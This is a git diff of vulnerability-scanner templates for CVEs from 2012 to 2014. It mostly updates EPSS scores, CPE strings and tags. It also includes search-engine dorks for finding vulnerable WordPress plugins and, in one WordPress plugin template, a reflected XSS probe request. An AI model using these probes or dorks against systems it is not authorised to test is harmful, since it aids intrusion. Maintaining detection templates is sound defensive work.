inurl:"/wp-content/plugins/all-in-one-event-calendar" diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 1d00465bd2..87c3abcf98 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00857 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* + epss-percentile: 0.80154 metadata: max-request: 1 vendor: mnt-tech diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 83f8ba0f8b..6075690e9f 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -21,6 +21,7 @@ info: cwe-id: NVD-CWE-noinfo epss-score: 0.97048 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* + epss-percentile: 0.99647 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 616b15c1de..c83fe0b501 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -11,16 +11,21 @@ info: - https://www.exploit-db.com/exploits/37488 - https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/76803 + - http://websitepanel.codeplex.com/workitem/224 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4032 cwe-id: CWE-20 + epss-score: 0.01204 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* + epss-percentile: 0.83485 metadata: max-request: 1 shodan-query: title:"WebsitePanel" html:"login" - tags: cve,cve2012,redirect,websitepanel,authenticated + vendor: websitepanel + product: websitepanel + tags: packetstorm,cve,cve2012,redirect,websitepanel,authenticated http: - raw: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index ca55067da3..c4e0b54e32 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -14,10 +14,11 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - cpe: cpe:2.3:a:matthew_fries:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* + cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* + epss-percentile: 0.5888 metadata: max-request: 1 - vendor: matthew_fries + vendor: mf_gig_calendar_project product: mf_gig_calendar tags: cve,cve2012,wordpress,xss,wp-plugin diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 008e4303f8..71994d47c9 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.03411 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* + epss-percentile: 0.9021 metadata: max-request: 1 vendor: mysqldumper diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index a8d9e9377e..80b3342b2c 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00252 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* + epss-percentile: 0.62364 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 2fcc5dfd37..f5def3fab2 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0023 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* + epss-percentile: 0.60499 metadata: max-request: 2 vendor: laurent_destailleur diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index b42ca9feec..76c094dcf5 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00922 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* + epss-percentile: 0.80933 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 792e7901f4..8135e487dd 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01193 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* + epss-percentile: 0.83395 metadata: max-request: 1 vendor: flatnux diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 90f92a0122..4aed02c5fb 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.02518 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* + epss-percentile: 0.88764 metadata: max-request: 1 vendor: manageengine diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 10c26ba029..ef6c9bd8c0 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - epss-score: 0.06126 + epss-score: 0.05321 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* + epss-percentile: 0.92093 metadata: max-request: 2 vendor: gecad diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 93039811cc..7b31d4cacd 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 epss-score: 0.00748 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* + epss-percentile: 0.78628 metadata: max-request: 1 vendor: forescout diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index f7419978b7..716bbd085d 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 epss-score: 0.02634 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* + epss-percentile: 0.88997 metadata: max-request: 1 shodan-query: http.html:"tiki wiki" diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index d40387d9be..7038a6011c 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2012-5913 cwe-id: CWE-79 - epss-score: 0.0029 + epss-score: 0.00828 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* + epss-percentile: 0.79806 metadata: max-request: 1 vendor: wordpress_integrator_project diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 8a20e43727..c63c685d5f 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 - epss-score: 0.01336 + epss-score: 0.01204 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* + epss-percentile: 0.83485 metadata: max-request: 1 vendor: age_verification_project diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index f76fea5b8b..5015946992 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-94 epss-score: 0.00813 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.79616 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index fd62f0d0f6..b0dcaec8c7 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 - epss-score: 0.97324 + epss-score: 0.9734 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99824 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 6101561478..27e13af909 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-20 epss-score: 0.97432 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99902 metadata: max-request: 9 vendor: apache diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index c7259eb354..de0a837c13 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00219 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* + epss-percentile: 0.59185 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/uploader" diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 03c32b67aa..16efbdf359 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 - epss-score: 0.03238 + epss-score: 0.03568 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* + epss-percentile: 0.90403 metadata: max-request: 2 vendor: telaen_project diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index b0939b8c2e..8594a53846 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00431 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.71323 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/trafficanalyzer" diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index cd199f9b77..4b36a59032 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5 cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo - epss-score: 0.1225 + epss-score: 0.73399 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* + epss-percentile: 0.97675 metadata: max-request: 10 vendor: oracle diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 163112e734..9f32bd4447 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.01217 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* + epss-percentile: 0.83576 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 4ebcddd057..5a18c62b6f 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -17,8 +17,9 @@ info: cvss-score: 4.3 cve-id: CVE-2013-4625 cwe-id: CWE-79 - epss-score: 0.01062 + epss-score: 0.01217 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* + epss-percentile: 0.83576 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/duplicator" diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index bec4181ac9..2595feecb3 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00442 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.71682 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 76c2b6ae72..288a73aac7 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - epss-score: 0.07589 + epss-score: 0.06969 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* + epss-percentile: 0.93073 metadata: max-request: 1 vendor: springsignage diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 1630af6d2e..09e8d32f80 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -8,7 +8,6 @@ info: WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 @@ -19,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00209 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* + epss-percentile: 0.5816 metadata: max-request: 1 google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 05d42a4de2..736dca7dc7 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.97375 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99856 metadata: max-request: 2 vendor: synacor diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index ddcf90e79c..63e153acaa 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.19842 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* + epss-percentile: 0.95661 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 010ecc9527..abe35b68fc 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-78 epss-score: 0.33561 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.96488 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 99aebf0b90..4f8ebc2918 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2014-10037 cwe-id: CWE-22 - epss-score: 0.22143 + epss-score: 0.18676 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* + epss-percentile: 0.95552 metadata: max-request: 1 vendor: domphp diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index df2b61659a..0d81f6f722 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-77 epss-score: 0.02045 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* + epss-percentile: 0.87539 metadata: max-request: 1 vendor: eyou diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 3225be3f89..c1d3aaa31d 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-264 epss-score: 0.96364 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* + epss-percentile: 0.99354 metadata: max-request: 1 vendor: zte diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 1c6d087629..f18961ea83 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.96912 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* + epss-percentile: 0.99594 metadata: max-request: 1 vendor: lighttpd diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index d01b7cc8fd..e4b9f8e694 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.00723 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* + epss-percentile: 0.78237 metadata: max-request: 11 verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 255676e3d2..ab1bdf4d22 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00594 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* + epss-percentile: 0.75612 metadata: max-request: 1 vendor: siemens diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 3038091383..3dcf210193 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.95825 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99198 metadata: max-request: 1 vendor: belkin diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index a44cb5d98e..f305011e39 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.8 cve-id: CVE-2014-3120 cwe-id: CWE-284 - epss-score: 0.58403 + epss-score: 0.55248 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* + epss-percentile: 0.97201 metadata: max-request: 1 vendor: elasticsearch diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 3e8d8748a8..9359e064eb 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - epss-score: 0.54403 + epss-score: 0.54379 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.9718 metadata: max-request: 2 vendor: seagate diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 3f91d4084b..6b9ecad336 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -21,6 +21,7 @@ info: cwe-id: CWE-89 epss-score: 0.97529 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + epss-percentile: 0.99982 metadata: max-request: 1 shodan-query: http.component:"drupal" diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index de71d819bb..dc4864b55f 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00672 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* + epss-percentile: 0.77222 metadata: max-request: 1 vendor: nodejs diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index e8dd39dede..13117da1e6 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -18,6 +18,7 @@ info: cwe-id: NVD-CWE-noinfo epss-score: 0.96955 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* + epss-percentile: 0.99613 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index fea1ded33b..250e6a7d11 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49694 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/activehelper-livehelp" diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 7949471a6e..b7e712c7e9 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47998 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 73319e63ff..9e3829c22f 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00149 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50284 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index df1c8f6d24..473d56007d 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47998 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 726abc9a94..0f3405a8a9 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00118 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45006 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 9483e844c5..56f0d0c017 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47998 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/shortcode-ninja" diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 40cf362e53..901bacfee3 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47998 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 40f279eea4..30fad1edf3 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00098 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.40032 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index bb13a16f9a..48df6c1f55 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -15,11 +15,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:* epss-score: 0.00135 + cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47998 metadata: google-query: inurl:"/wp-content/plugins/wp-planet" max-request: 2 + framework: wordpress + vendor: czepol + product: wp-planet tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth http: @@ -27,7 +31,6 @@ http: - | GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} @@ -51,4 +54,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 4e3bf6b71e..b2063f1f48 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.03891 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* + epss-percentile: 0.90789 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/tera-charts" diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 0282c870f2..fa531125a7 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.01024 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.81955 metadata: max-request: 1 framework: wordpress @@ -49,4 +50,4 @@ http: part: body group: 1 regex: - - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file + - '>PHP Version <\/td>([0-9.]+)' diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index c1a1eb9827..0bfb089b37 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.0445 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* + epss-percentile: 0.91352 metadata: max-request: 1 vendor: netfortris diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index e19eb46c6f..073c8176a6 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01386 cpe: 